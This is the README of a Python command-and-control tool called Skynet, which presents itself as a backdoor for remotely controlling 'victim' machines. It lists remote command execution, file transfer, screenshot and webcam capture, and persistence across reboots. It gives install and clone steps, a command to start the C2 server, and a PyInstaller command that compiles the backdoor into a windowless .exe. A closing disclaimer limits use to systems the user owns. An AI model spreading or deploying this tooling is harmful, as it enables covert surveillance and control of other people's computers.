Skynet is a powerful Command and Control (C2) designed for interacting with and managing multiple devices remotely through a backdoor. This software allows for command execution, file transfer, and capturing screenshots and webcam images from the victim's machine. Its functionality includes persistence, ensuring that the backdoor remains active even after reboots.
- Persistence: The backdoor is configured to automatically start upon system boot, ensuring its presence on every startup.
- Remote Interaction: Provides a command-line interface that allows operators to effectively interact with the victim's system.
To run Skynet, make sure you have the following Python libraries installed:
pip install mss opencv-python
-
Clone the repository:
git clone https://github.com/17tayyy/skynet.git cd skynet
-
Run the C2 server:
python3 skynet.py
-
Compile the backdoor (optional):
To compile the backdoor into a
.exe
executable, usePyInstaller
:pyinstaller --onefile --noconsole backdoor.py
Skynet is a powerful tool and should be used ethically and legally. Unauthorized use on systems you do not own is illegal and could lead to legal consequences. Use this tool only on systems you own or in controlled testing environments.